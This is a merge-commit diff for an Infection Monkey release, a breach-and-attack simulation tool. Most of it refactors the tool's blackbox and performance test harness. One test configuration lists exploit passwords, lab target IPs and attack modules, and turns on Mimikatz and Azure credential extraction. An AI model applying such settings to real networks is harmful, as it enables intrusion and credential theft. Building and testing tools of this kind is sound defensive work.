Merge pull request #663 from guardicore/release/1.8.2

Release/1.8.2
This commit is contained in:
Shay Nehmad 2020-06-07 16:04:00 +03:00 committed by GitHub
commit 3726a14f68
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
201 changed files with 9070 additions and 14830 deletions

6
.gitignore vendored
View File

@ -82,5 +82,11 @@ MonkeyZoo/*
!MonkeyZoo/config.tf
!MonkeyZoo/MonkeyZooDocs.pdf
# Exported monkey telemetries
/monkey/telem_sample/
# Profiling logs
profiler_logs/
# vim swap files
*.swp

View File

@ -1,10 +1,15 @@
# Infection Monkey travis.yml. See Travis documentation for information about this file structure.
# If you change this file, you can validate using Travis CI's Build Config Explorer https://config.travis-ci.com/explore
group: travis_latest
language: python
cache: pip
cache:
- pip
- directories:
- "$HOME/.npm"
python:
- 3.7
@ -18,6 +23,16 @@ install:
- pip install coverage # for code coverage
- pip install -r monkey/infection_monkey/requirements.txt # for unit tests
# node + npm + eslint
- node --version
- npm --version
- nvm --version
- nvm install node
- nvm use node
- npm i -g eslint
- node --version
- npm --version
before_script:
# Set the server config to `testing`. This is required for for the UTs to pass.
- python monkey/monkey_island/cc/set_server_config.py testing
@ -36,7 +51,7 @@ script:
## Display the linter issues
- cat flake8_warnings.txt
## Make sure that we haven't increased the amount of warnings.
- PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT=190
- PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT=120
- if [ $(tail -n 1 flake8_warnings.txt) -gt $PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT ]; then echo "Too many python linter warnings! Failing this build. Lower the amount of linter errors in this and try again. " && exit 1; fi
## Run unit tests
@ -48,13 +63,10 @@ script:
# Check JS code. The npm install must happen AFTER the flake8 because the node_modules folder will cause a lot of errors.
- cd monkey_island/cc/ui
- npm i
- npm i -g eslint
- cd -
- cd monkey_island/cc/ui
- eslint ./src --quiet
- JS_WARNINGS_AMOUNT_UPPER_LIMIT=37
- eslint ./src --max-warnings $JS_WARNINGS_AMOUNT_UPPER_LIMIT
- npm ci # See https://docs.npmjs.com/cli/ci.html
- eslint ./src --quiet # Test for errors
- JS_WARNINGS_AMOUNT_UPPER_LIMIT=490
- eslint ./src --max-warnings $JS_WARNINGS_AMOUNT_UPPER_LIMIT # Test for max warnings
after_success:
# Upload code coverage results to codecov.io, see https://github.com/codecov/codecov-bash for more information

View File

@ -1 +1,2 @@
logs/
/blackbox/tests/performance/telem_sample

View File

@ -10,10 +10,37 @@ In order to execute the entire test suite, you must know the external IP of the
this information in the GCP Console `Compute Engine/VM Instances` under _External IP_.
#### Running in command line
Run the following command:
Blackbox tests have following parameters:
- `--island=IP` Sets island's IP
- `--no-gcp` (Optional) Use for no interaction with the cloud (local test).
- `--quick-performance-tests` (Optional) If enabled performance tests won't reset island and won't send telemetries,
instead will just test performance of endpoints in already present island state.
`monkey\envs\monkey_zoo\blackbox>python -m pytest --island=35.207.152.72:5000 test_blackbox.py`
Example run command:
`monkey\envs\monkey_zoo\blackbox>python -m pytest -s --island=35.207.152.72:5000 test_blackbox.py`
#### Running in PyCharm
Configure a PyTest configuration with the additional argument `--island=35.207.152.72` on the
Configure a PyTest configuration with the additional arguments `-s --island=35.207.152.72` on the
`monkey\envs\monkey_zoo\blackbox`.
### Running telemetry performance test
**Before running performance test make sure browser is not sending requests to island!**
To run telemetry performance test follow these steps:
1. Gather monkey telemetries.
1. Enable "Export monkey telemetries" in Configuration -> Internal -> Tests if you don't have
exported telemetries already.
2. Run monkey and wait until infection is done.
3. All telemetries are gathered in `monkey/telem_sample`
2. Run telemetry performance test.
1. Move directory `monkey/test_telems` to `envs/monkey_zoo/blackbox/tests/performance/test_telems`
2. (Optional) Use `envs/monkey_zoo/blackbox/tests/performance/utils/telem_parser.py` to multiply
telemetries gathered.
1. Run `telem_parser.py` script with working directory set to `monkey\envs\monkey_zoo\blackbox`
2. Pass integer to indicate the multiplier. For example running `telem_parser.py 4` will replicate
telemetries 4 times.
3. If you're using pycharm check "Emulate terminal in output console" on debug/run configuraion.
3. Performance test will run as part of BlackBox tests or you can run it separately by adding
`-k 'test_telem_performance'` option.

View File

@ -1,59 +1,48 @@
import logging
from datetime import timedelta
from typing import Dict
from envs.monkey_zoo.blackbox.analyzers.analyzer import Analyzer
from envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient
from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
MAX_ALLOWED_SINGLE_PAGE_TIME = timedelta(seconds=2)
MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=5)
REPORT_URLS = [
"api/report/security",
"api/attack/report",
"api/report/zero_trust/findings",
"api/report/zero_trust/principles",
"api/report/zero_trust/pillars"
]
logger = logging.getLogger(__name__)
LOGGER = logging.getLogger(__name__)
class PerformanceAnalyzer(Analyzer):
def __init__(self, island_client: MonkeyIslandClient, break_if_took_too_long=False):
self.break_if_took_too_long = break_if_took_too_long
self.island_client = island_client
def __init__(self, performance_test_config: PerformanceTestConfig, endpoint_timings: Dict[str, timedelta]):
self.performance_test_config = performance_test_config
self.endpoint_timings = endpoint_timings
def analyze_test_results(self) -> bool:
if not self.island_client.is_all_monkeys_dead():
raise RuntimeError("Can't test report times since not all Monkeys have died.")
# Collect timings for all pages
self.island_client.clear_caches()
report_resource_to_response_time = {}
for url in REPORT_URLS:
report_resource_to_response_time[url] = self.island_client.get_elapsed_for_get_request(url)
# Calculate total time and check each page
def analyze_test_results(self):
# Calculate total time and check each endpoint
single_page_time_less_then_max = True
total_time = timedelta()
for page, elapsed in report_resource_to_response_time.items():
logger.info(f"page {page} took {str(elapsed)}")
for endpoint, elapsed in self.endpoint_timings.items():
total_time += elapsed
if elapsed > MAX_ALLOWED_SINGLE_PAGE_TIME:
if elapsed > self.performance_test_config.max_allowed_single_page_time:
single_page_time_less_then_max = False
total_time_less_then_max = total_time < MAX_ALLOWED_TOTAL_TIME
total_time_less_then_max = total_time < self.performance_test_config.max_allowed_total_time
logger.info(f"total time is {str(total_time)}")
PerformanceAnalyzer.log_slowest_endpoints(self.endpoint_timings)
LOGGER.info(f"Total time is {str(total_time)}")
performance_is_good_enough = total_time_less_then_max and single_page_time_less_then_max
if self.break_if_took_too_long and not performance_is_good_enough:
logger.warning(
if self.performance_test_config.break_on_timeout and not performance_is_good_enough:
LOGGER.warning(
"Calling breakpoint - pausing to enable investigation of island. Type 'c' to continue once you're done "
"investigating. Type 'p timings' and 'p total_time' to see performance information."
)
breakpoint()
return performance_is_good_enough
@staticmethod
def log_slowest_endpoints(endpoint_timings, max_endpoints_to_display=100):
slow_endpoint_list = list(endpoint_timings.items())
slow_endpoint_list.sort(key=lambda x: x[1], reverse=True)
slow_endpoint_list = slow_endpoint_list[:max_endpoints_to_display]
for endpoint in slow_endpoint_list:
LOGGER.info(f"{endpoint[0]} took {str(endpoint[1])}")

View File

@ -4,8 +4,23 @@ import pytest
def pytest_addoption(parser):
parser.addoption("--island", action="store", default="",
help="Specify the Monkey Island address (host+port).")
parser.addoption("--no-gcp", action="store_true", default=False,
help="Use for no interaction with the cloud.")
parser.addoption("--quick-performance-tests", action="store_true", default=False,
help="If enabled performance tests won't reset island and won't send telemetries, "
"instead will just test performance of already present island state.")
@pytest.fixture(scope='module')
@pytest.fixture(scope='session')
def island(request):
return request.config.getoption("--island")
@pytest.fixture(scope='session')
def no_gcp(request):
return request.config.getoption("--no-gcp")
@pytest.fixture(scope='session')
def quick_performance_tests(request):
return request.config.getoption("--quick-performance-tests")

View File

@ -1,8 +1,8 @@
from datetime import timedelta
from time import sleep
import json
import logging
from time import sleep
from bson import json_util
from envs.monkey_zoo.blackbox.island_client.monkey_island_requests import MonkeyIslandRequests
@ -31,7 +31,7 @@ class MonkeyIslandClient(object):
@avoid_race_condition
def run_monkey_local(self):
response = self.requests.post_json("api/local-monkey", dict_data={"action": "run"})
response = self.requests.post_json("api/local-monkey", data={"action": "run"})
if MonkeyIslandClient.monkey_ran_successfully(response):
LOGGER.info("Running the monkey.")
else:
@ -96,13 +96,3 @@ class MonkeyIslandClient(object):
response = self.requests.get("api/test/clear_caches")
response.raise_for_status()
return response
def get_elapsed_for_get_request(self, url):
response = self.requests.get(url)
if response.ok:
LOGGER.debug(f"Got ok for {url} content peek:\n{response.content[:120].strip()}")
return response.elapsed
else:
LOGGER.error(f"Trying to get {url} but got unexpected {str(response)}")
# instead of raising for status, mark failed responses as maxtime
return timedelta.max()

View File

@ -1,9 +1,15 @@
from typing import Dict
from datetime import timedelta
import requests
import functools
# SHA3-512 of '1234567890!@#$%^&*()_nothing_up_my_sleeve_1234567890!@#$%^&*()'
from envs.monkey_zoo.blackbox.island_client.supported_request_method import SupportedRequestMethod
import logging
# SHA3-512 of '1234567890!@#$%^&*()_nothing_up_my_sleeve_1234567890!@#$%^&*()'
NO_AUTH_CREDS = '55e97c9dcfd22b8079189ddaeea9bce8125887e3237b800c6176c9afa80d2062' \
'8d2c8d0b1538d2208c1444ac66535b764a3d902b35e751df3faec1e477ed3557'
LOGGER = logging.getLogger(__name__)
@ -14,6 +20,26 @@ class MonkeyIslandRequests(object):
def __init__(self, server_address):
self.addr = "https://{IP}/".format(IP=server_address)
self.token = self.try_get_jwt_from_server()
self.supported_request_methods = {SupportedRequestMethod.GET: self.get,
SupportedRequestMethod.POST: self.post,
SupportedRequestMethod.PATCH: self.patch,
SupportedRequestMethod.DELETE: self.delete}
def get_request_time(self, url, method: SupportedRequestMethod, data=None):
response = self.send_request_by_method(url, method, data)
if response.ok:
LOGGER.debug(f"Got ok for {url} content peek:\n{response.content[:120].strip()}")
return response.elapsed
else:
LOGGER.error(f"Trying to get {url} but got unexpected {str(response)}")
# instead of raising for status, mark failed responses as maxtime
return timedelta.max
def send_request_by_method(self, url, method=SupportedRequestMethod.GET, data=None):
if data:
return self.supported_request_methods[method](url, data)
else:
return self.supported_request_methods[method](url)
def try_get_jwt_from_server(self):
try:
@ -55,12 +81,20 @@ class MonkeyIslandRequests(object):
verify=False)
@_Decorators.refresh_jwt_token
def post_json(self, url, dict_data):
def post_json(self, url, data: Dict):
return requests.post(self.addr + url, # noqa: DUO123
json=dict_data,
json=data,
headers=self.get_jwt_header(),
verify=False)
@_Decorators.refresh_jwt_token
def patch(self, url, data: Dict):
return requests.patch(self.addr + url, # noqa: DUO123
data=data,
headers=self.get_jwt_header(),
verify=False
)
@_Decorators.refresh_jwt_token
def delete(self, url):
return requests.delete( # noqa: DOU123

View File

@ -0,0 +1,8 @@
from enum import Enum
class SupportedRequestMethod(Enum):
GET = "GET"
POST = "POST"
PATCH = "PATCH"
DELETE = "DELETE"

View File

@ -2,14 +2,15 @@
"basic": {
"credentials": {
"exploit_password_list": [
"Password1!",
"12345678",
"^NgDvY59~8"
"Xk8VDTsC",
"^NgDvY59~8",
"Ivrrw5zEzs",
"3Q=(Ge(+&w]*",
"`))jU7L(w}",
"t67TC5ZDmz"
],
"exploit_user_list": [
"Administrator",
"m0nk3y",
"user"
"m0nk3y"
]
},
"general": {
@ -23,11 +24,38 @@
"local_network_scan": false,
"subnet_scan_list": [
"10.2.2.2",
"10.2.2.4"
"10.2.2.3",
"10.2.2.4",
"10.2.2.5",
"10.2.2.8",
"10.2.2.9",
"10.2.1.10",
"10.2.0.11",
"10.2.0.12",
"10.2.2.11",
"10.2.2.12",
"10.2.2.14",
"10.2.2.15",
"10.2.2.16",
"10.2.2.18",
"10.2.2.19",
"10.2.2.20",
"10.2.2.21",
"10.2.2.23",
"10.2.2.24"
]
},
"network_analysis": {
"inaccessible_subnets": []
"inaccessible_subnets": [
"10.2.2.0/30",
"10.2.2.8/30",
"10.2.2.24/32",
"10.2.2.23/32",
"10.2.2.21/32",
"10.2.2.19/32",
"10.2.2.18/32",
"10.2.2.17/32"
]
}
},
"cnc": {
@ -45,10 +73,17 @@
"exploits": {
"general": {
"exploiter_classes": [
"SmbExploiter",
"WmiExploiter",
"SSHExploiter",
"MSSQLExploiter",
"ShellShockExploiter",
"SambaCryExploiter",
"ElasticGroovyExploiter",
"HadoopExploiter"
"Struts2Exploiter",
"WebLogicExploiter",
"HadoopExploiter",
"VSFTPDExploiter",
"MSSQLExploiter"
],
"skip_exploit_if_file_exist": false
},
@ -57,9 +92,6 @@
"remote_user_pass": "Password1!",
"user_to_add": "Monkey_IUSER_SUPPORT"
},
"rdp_grinder": {
"rdp_use_vbs_download": true
},
"sambacry": {
"sambacry_folder_paths_to_guess": [
"/",
@ -109,7 +141,7 @@
"exploit_ssh_keys": []
},
"general": {
"keep_tunnel_open_time": 1,
"keep_tunnel_open_time": 60,
"monkey_dir_name": "monkey_dir",
"singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}"
},
@ -123,6 +155,9 @@
"monkey_log_path_linux": "/tmp/user-1563",
"monkey_log_path_windows": "%temp%\\~df1563.tmp",
"send_log_to_server": true
},
"testing": {
"export_monkey_telems": true
}
},
"monkey": {
@ -137,24 +172,32 @@
},
"general": {
"alive": true,
"post_breach_actions": []
"post_breach_actions": [
"CommunicateAsNewUser"
]
},
"life_cycle": {
"max_iterations": 1,
"retry_failed_explotation": true,
"timeout_between_iterations": 100,
"victims_max_exploit": 7,
"victims_max_find": 30
"victims_max_exploit": 15,
"victims_max_find": 100
},
"system_info": {
"collect_system_info": true,
"extract_azure_creds": false,
"should_use_mimikatz": true
"extract_azure_creds": true,
"should_use_mimikatz": true,
"system_info_collectors_classes": [
"EnvironmentCollector",
"AwsCollector",
"HostnameCollector",
"ProcessListCollector"
]
}
},
"network": {
"ping_scanner": {
"ping_scan_timeout": 500
"ping_scan_timeout": 1000
},
"tcp_scanner": {
"HTTP_PORTS": [
@ -166,7 +209,7 @@
],
"tcp_scan_get_banner": true,
"tcp_scan_interval": 0,
"tcp_scan_timeout": 1000,
"tcp_scan_timeout": 3000,
"tcp_target_ports": [
22,
2222,
@ -179,7 +222,8 @@
8008,
3306,
9200,
7001
7001,
8088
]
}
}

View File

@ -1,6 +1,6 @@
import logging
import os
import logging
from bson import ObjectId
LOGGER = logging.getLogger(__name__)

View File

@ -1,8 +1,7 @@
import logging
import os
import shutil
import logging
from envs.monkey_zoo.blackbox.log_handlers.monkey_log_parser import MonkeyLogParser
from envs.monkey_zoo.blackbox.log_handlers.monkey_logs_downloader import MonkeyLogsDownloader

View File

@ -4,13 +4,18 @@ import logging
import pytest
from time import sleep
from envs.monkey_zoo.blackbox.analyzers.performance_analyzer import PerformanceAnalyzer
from envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient
from envs.monkey_zoo.blackbox.analyzers.communication_analyzer import CommunicationAnalyzer
from envs.monkey_zoo.blackbox.island_client.island_config_parser import IslandConfigParser
from envs.monkey_zoo.blackbox.utils import gcp_machine_handlers
from envs.monkey_zoo.blackbox.tests.basic_test import BasicTest
from envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient
from envs.monkey_zoo.blackbox.log_handlers.test_logs_handler import TestLogsHandler
from envs.monkey_zoo.blackbox.tests.exploitation import ExploitationTest
from envs.monkey_zoo.blackbox.tests.performance.map_generation import MapGenerationTest
from envs.monkey_zoo.blackbox.tests.performance.map_generation_from_telemetries import MapGenerationFromTelemetryTest
from envs.monkey_zoo.blackbox.tests.performance.report_generation import ReportGenerationTest
from envs.monkey_zoo.blackbox.tests.performance.report_generation_from_telemetries import \
ReportGenerationFromTelemetryTest
from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test import TelemetryPerformanceTest
from envs.monkey_zoo.blackbox.utils import gcp_machine_handlers
DEFAULT_TIMEOUT_SECONDS = 5*60
MACHINE_BOOTUP_WAIT_SECONDS = 30
@ -22,15 +27,16 @@ LOGGER = logging.getLogger(__name__)
@pytest.fixture(autouse=True, scope='session')
def GCPHandler(request):
GCPHandler = gcp_machine_handlers.GCPHandler()
GCPHandler.start_machines(" ".join(GCP_TEST_MACHINE_LIST))
wait_machine_bootup()
def GCPHandler(request, no_gcp):
if not no_gcp:
GCPHandler = gcp_machine_handlers.GCPHandler()
GCPHandler.start_machines(" ".join(GCP_TEST_MACHINE_LIST))
wait_machine_bootup()
def fin():
GCPHandler.stop_machines(" ".join(GCP_TEST_MACHINE_LIST))
def fin():
GCPHandler.stop_machines(" ".join(GCP_TEST_MACHINE_LIST))
request.addfinalizer(fin)
request.addfinalizer(fin)
@pytest.fixture(autouse=True, scope='session')
@ -44,9 +50,10 @@ def wait_machine_bootup():
@pytest.fixture(scope='class')
def island_client(island):
def island_client(island, quick_performance_tests):
island_client_object = MonkeyIslandClient(island)
island_client_object.reset_env()
if not quick_performance_tests:
island_client_object.reset_env()
yield island_client_object
@ -55,34 +62,32 @@ def island_client(island):
class TestMonkeyBlackbox(object):
@staticmethod
def run_basic_test(island_client, conf_filename, test_name, timeout_in_seconds=DEFAULT_TIMEOUT_SECONDS):
def run_exploitation_test(island_client, conf_filename, test_name, timeout_in_seconds=DEFAULT_TIMEOUT_SECONDS):
config_parser = IslandConfigParser(conf_filename)
analyzer = CommunicationAnalyzer(island_client, config_parser.get_ips_of_targets())
log_handler = TestLogsHandler(test_name, island_client, TestMonkeyBlackbox.get_log_dir_path())
BasicTest(
ExploitationTest(
name=test_name,
island_client=island_client,
config_parser=config_parser,
analyzers=[analyzer],
timeout=timeout_in_seconds,
post_exec_analyzers=[],
log_handler=log_handler).run()
@staticmethod
def run_performance_test(island_client, conf_filename, test_name, timeout_in_seconds):
def run_performance_test(performance_test_class, island_client,
conf_filename, timeout_in_seconds, break_on_timeout=False):
config_parser = IslandConfigParser(conf_filename)
log_handler = TestLogsHandler(test_name, island_client, TestMonkeyBlackbox.get_log_dir_path())
BasicTest(
name=test_name,
island_client=island_client,
config_parser=config_parser,
analyzers=[CommunicationAnalyzer(island_client, config_parser.get_ips_of_targets())],
timeout=timeout_in_seconds,
post_exec_analyzers=[PerformanceAnalyzer(
island_client,
break_if_took_too_long=False
)],
log_handler=log_handler).run()
log_handler = TestLogsHandler(performance_test_class.TEST_NAME,
island_client,
TestMonkeyBlackbox.get_log_dir_path())
analyzers = [CommunicationAnalyzer(island_client, config_parser.get_ips_of_targets())]
performance_test_class(island_client=island_client,
config_parser=config_parser,
analyzers=analyzers,
timeout=timeout_in_seconds,
log_handler=log_handler,
break_on_timeout=break_on_timeout).run()
@staticmethod
def get_log_dir_path():
@ -92,43 +97,42 @@ class TestMonkeyBlackbox(object):
assert island_client.get_api_status() is not None
def test_ssh_exploiter(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "SSH.conf", "SSH_exploiter_and_keys")
TestMonkeyBlackbox.run_exploitation_test(island_client, "SSH.conf", "SSH_exploiter_and_keys")
def test_hadoop_exploiter(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "HADOOP.conf", "Hadoop_exploiter", 6*60)
TestMonkeyBlackbox.run_exploitation_test(island_client, "HADOOP.conf", "Hadoop_exploiter", 6 * 60)
def test_mssql_exploiter(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "MSSQL.conf", "MSSQL_exploiter")
TestMonkeyBlackbox.run_exploitation_test(island_client, "MSSQL.conf", "MSSQL_exploiter")
def test_smb_and_mimikatz_exploiters(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "SMB_MIMIKATZ.conf", "SMB_exploiter_mimikatz")
TestMonkeyBlackbox.run_exploitation_test(island_client, "SMB_MIMIKATZ.conf", "SMB_exploiter_mimikatz")
def test_smb_pth(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "SMB_PTH.conf", "SMB_PTH")
TestMonkeyBlackbox.run_exploitation_test(island_client, "SMB_PTH.conf", "SMB_PTH")
def test_elastic_exploiter(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "ELASTIC.conf", "Elastic_exploiter")
TestMonkeyBlackbox.run_exploitation_test(island_client, "ELASTIC.conf", "Elastic_exploiter")
def test_struts_exploiter(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "STRUTS2.conf", "Strtuts2_exploiter")
TestMonkeyBlackbox.run_exploitation_test(island_client, "STRUTS2.conf", "Strtuts2_exploiter")
def test_weblogic_exploiter(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "WEBLOGIC.conf", "Weblogic_exploiter")
TestMonkeyBlackbox.run_exploitation_test(island_client, "WEBLOGIC.conf", "Weblogic_exploiter")
def test_shellshock_exploiter(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "SHELLSHOCK.conf", "Shellschock_exploiter")
TestMonkeyBlackbox.run_exploitation_test(island_client, "SHELLSHOCK.conf", "Shellschock_exploiter")
def test_tunneling(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "TUNNELING.conf", "Tunneling_exploiter", 15*60)
TestMonkeyBlackbox.run_exploitation_test(island_client, "TUNNELING.conf", "Tunneling_exploiter", 15 * 60)
def test_wmi_and_mimikatz_exploiters(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "WMI_MIMIKATZ.conf", "WMI_exploiter,_mimikatz")
TestMonkeyBlackbox.run_exploitation_test(island_client, "WMI_MIMIKATZ.conf", "WMI_exploiter,_mimikatz")
def test_wmi_pth(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "WMI_PTH.conf", "WMI_PTH")
TestMonkeyBlackbox.run_exploitation_test(island_client, "WMI_PTH.conf", "WMI_PTH")
@pytest.mark.xfail(reason="Performance is slow, will improve on release 1.9.")
def test_performance(self, island_client):
def test_report_generation_performance(self, island_client, quick_performance_tests):
"""
This test includes the SSH + Elastic + Hadoop + MSSQL machines all in one test
for a total of 8 machines including the Monkey Island.
@ -136,8 +140,30 @@ class TestMonkeyBlackbox(object):
Is has 2 analyzers - the regular one which checks all the Monkeys
and the Timing one which checks how long the report took to execute
"""
TestMonkeyBlackbox.run_performance_test(
island_client,
"PERFORMANCE.conf",
"test_report_performance",
timeout_in_seconds=10*60)
if not quick_performance_tests:
TestMonkeyBlackbox.run_performance_test(ReportGenerationTest,
island_client,
"PERFORMANCE.conf",
timeout_in_seconds=10*60)
else:
LOGGER.error("This test doesn't support 'quick_performance_tests' option.")
assert False
def test_map_generation_performance(self, island_client, quick_performance_tests):
if not quick_performance_tests:
TestMonkeyBlackbox.run_performance_test(MapGenerationTest,
island_client,
"PERFORMANCE.conf",
timeout_in_seconds=10*60)
else:
LOGGER.error("This test doesn't support 'quick_performance_tests' option.")
assert False
def test_report_generation_from_fake_telemetries(self, island_client, quick_performance_tests):
ReportGenerationFromTelemetryTest(island_client, quick_performance_tests).run()
def test_map_generation_from_fake_telemetries(self, island_client, quick_performance_tests):
MapGenerationFromTelemetryTest(island_client, quick_performance_tests).run()
def test_telem_performance(self, island_client, quick_performance_tests):
TelemetryPerformanceTest(island_client, quick_performance_tests).test_telemetry_performance()

View File

@ -1,100 +1,8 @@
from time import sleep
import logging
from envs.monkey_zoo.blackbox.utils.test_timer import TestTimer
MAX_TIME_FOR_MONKEYS_TO_DIE = 5 * 60
WAIT_TIME_BETWEEN_REQUESTS = 10
TIME_FOR_MONKEY_PROCESS_TO_FINISH = 40
DELAY_BETWEEN_ANALYSIS = 3
LOGGER = logging.getLogger(__name__)
import abc
class BasicTest(object):
def __init__(self, name, island_client, config_parser, analyzers, timeout, post_exec_analyzers, log_handler):
self.name = name
self.island_client = island_client
self.config_parser = config_parser
self.analyzers = analyzers
self.post_exec_analyzers = post_exec_analyzers
self.timeout = timeout
self.log_handler = log_handler
class BasicTest(abc.ABC):
@abc.abstractmethod
def run(self):
self.island_client.import_config(self.config_parser.config_raw)
self.print_test_starting_info()
try:
self.island_client.run_monkey_local()
self.test_until_timeout()
finally:
self.island_client.kill_all_monkeys()
self.wait_until_monkeys_die()
self.wait_for_monkey_process_to_finish()
self.test_post_exec_analyzers()
self.parse_logs()
self.island_client.reset_env()
def print_test_starting_info(self):
LOGGER.info("Started {} test".format(self.name))
LOGGER.info("Machines participating in test: " + ", ".join(self.config_parser.get_ips_of_targets()))
print("")
def test_until_timeout(self):
timer = TestTimer(self.timeout)
while not timer.is_timed_out():
if self.all_analyzers_pass():
self.log_success(timer)
return
sleep(DELAY_BETWEEN_ANALYSIS)
LOGGER.debug("Waiting until all analyzers passed. Time passed: {}".format(timer.get_time_taken()))
self.log_failure(timer)
assert False
def log_success(self, timer):
LOGGER.info(self.get_analyzer_logs())
LOGGER.info("{} test passed, time taken: {:.1f} seconds.".format(self.name, timer.get_time_taken()))
def log_failure(self, timer):
LOGGER.info(self.get_analyzer_logs())
LOGGER.error("{} test failed because of timeout. Time taken: {:.1f} seconds.".format(self.name,
timer.get_time_taken()))
def all_analyzers_pass(self):
analyzers_results = [analyzer.analyze_test_results() for analyzer in self.analyzers]
return all(analyzers_results)
def get_analyzer_logs(self):
log = ""
for analyzer in self.analyzers:
log += "\n" + analyzer.log.get_contents()
return log
def wait_until_monkeys_die(self):
time_passed = 0
while not self.island_client.is_all_monkeys_dead() and time_passed < MAX_TIME_FOR_MONKEYS_TO_DIE:
sleep(WAIT_TIME_BETWEEN_REQUESTS)
time_passed += WAIT_TIME_BETWEEN_REQUESTS
LOGGER.debug("Waiting for all monkeys to die. Time passed: {}".format(time_passed))
if time_passed > MAX_TIME_FOR_MONKEYS_TO_DIE:
LOGGER.error("Some monkeys didn't die after the test, failing")
assert False
def parse_logs(self):
LOGGER.info("Parsing test logs:")
self.log_handler.parse_test_logs()
@staticmethod
def wait_for_monkey_process_to_finish():
"""
There is a time period when monkey is set to dead, but the process is still closing.
If we try to launch monkey during that time window monkey will fail to start, that's
why test needs to wait a bit even after all monkeys are dead.
"""
LOGGER.debug("Waiting for Monkey process to close...")
sleep(TIME_FOR_MONKEY_PROCESS_TO_FINISH)
def test_post_exec_analyzers(self):
post_exec_analyzers_results = [analyzer.analyze_test_results() for analyzer in self.post_exec_analyzers]
assert all(post_exec_analyzers_results)
pass

View File

@ -0,0 +1,94 @@
import logging
from time import sleep
from envs.monkey_zoo.blackbox.tests.basic_test import BasicTest
from envs.monkey_zoo.blackbox.utils.test_timer import TestTimer
MAX_TIME_FOR_MONKEYS_TO_DIE = 5 * 60
WAIT_TIME_BETWEEN_REQUESTS = 10
TIME_FOR_MONKEY_PROCESS_TO_FINISH = 40
DELAY_BETWEEN_ANALYSIS = 3
LOGGER = logging.getLogger(__name__)
class ExploitationTest(BasicTest):
def __init__(self, name, island_client, config_parser, analyzers, timeout, log_handler):
self.name = name
self.island_client = island_client
self.config_parser = config_parser
self.analyzers = analyzers
self.timeout = timeout
self.log_handler = log_handler
def run(self):
self.island_client.import_config(self.config_parser.config_raw)
self.print_test_starting_info()
try:
self.island_client.run_monkey_local()
self.test_until_timeout()
finally:
self.island_client.kill_all_monkeys()
self.wait_until_monkeys_die()
self.wait_for_monkey_process_to_finish()
self.parse_logs()
self.island_client.reset_env()
def print_test_starting_info(self):
LOGGER.info("Started {} test".format(self.name))
LOGGER.info("Machines participating in test: " + ", ".join(self.config_parser.get_ips_of_targets()))
print("")
def test_until_timeout(self):
timer = TestTimer(self.timeout)
while not timer.is_timed_out():
if self.all_analyzers_pass():
self.log_success(timer)
return
sleep(DELAY_BETWEEN_ANALYSIS)
LOGGER.debug("Waiting until all analyzers passed. Time passed: {}".format(timer.get_time_taken()))
self.log_failure(timer)
assert False
def log_success(self, timer):
LOGGER.info(self.get_analyzer_logs())
LOGGER.info("{} test passed, time taken: {:.1f} seconds.".format(self.name, timer.get_time_taken()))
def log_failure(self, timer):
LOGGER.info(self.get_analyzer_logs())
LOGGER.error("{} test failed because of timeout. Time taken: {:.1f} seconds.".format(self.name,
timer.get_time_taken()))
def all_analyzers_pass(self):
analyzers_results = [analyzer.analyze_test_results() for analyzer in self.analyzers]
return all(analyzers_results)
def get_analyzer_logs(self):
log = ""
for analyzer in self.analyzers:
log += "\n" + analyzer.log.get_contents()
return log
def wait_until_monkeys_die(self):
time_passed = 0
while not self.island_client.is_all_monkeys_dead() and time_passed < MAX_TIME_FOR_MONKEYS_TO_DIE:
sleep(WAIT_TIME_BETWEEN_REQUESTS)
time_passed += WAIT_TIME_BETWEEN_REQUESTS
LOGGER.debug("Waiting for all monkeys to die. Time passed: {}".format(time_passed))
if time_passed > MAX_TIME_FOR_MONKEYS_TO_DIE:
LOGGER.error("Some monkeys didn't die after the test, failing")
assert False
def parse_logs(self):
LOGGER.info("Parsing test logs:")
self.log_handler.parse_test_logs()
@staticmethod
def wait_for_monkey_process_to_finish():
"""
There is a time period when monkey is set to dead, but the process is still closing.
If we try to launch monkey during that time window monkey will fail to start, that's
why test needs to wait a bit even after all monkeys are dead.
"""
LOGGER.debug("Waiting for Monkey process to close...")
sleep(TIME_FOR_MONKEY_PROCESS_TO_FINISH)

View File

@ -0,0 +1,28 @@
import logging
from envs.monkey_zoo.blackbox.analyzers.performance_analyzer import PerformanceAnalyzer
from envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient
from envs.monkey_zoo.blackbox.island_client.supported_request_method import SupportedRequestMethod
from envs.monkey_zoo.blackbox.tests.basic_test import BasicTest
from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
LOGGER = logging.getLogger(__name__)
class EndpointPerformanceTest(BasicTest):
def __init__(self, name, test_config: PerformanceTestConfig, island_client: MonkeyIslandClient):
self.name = name
self.test_config = test_config
self.island_client = island_client
def run(self) -> bool:
# Collect timings for all pages
endpoint_timings = {}
for endpoint in self.test_config.endpoints_to_test:
self.island_client.clear_caches()
endpoint_timings[endpoint] = self.island_client.requests.get_request_time(endpoint,
SupportedRequestMethod.GET)
analyzer = PerformanceAnalyzer(self.test_config, endpoint_timings)
return analyzer.analyze_test_results()

View File

@ -0,0 +1,35 @@
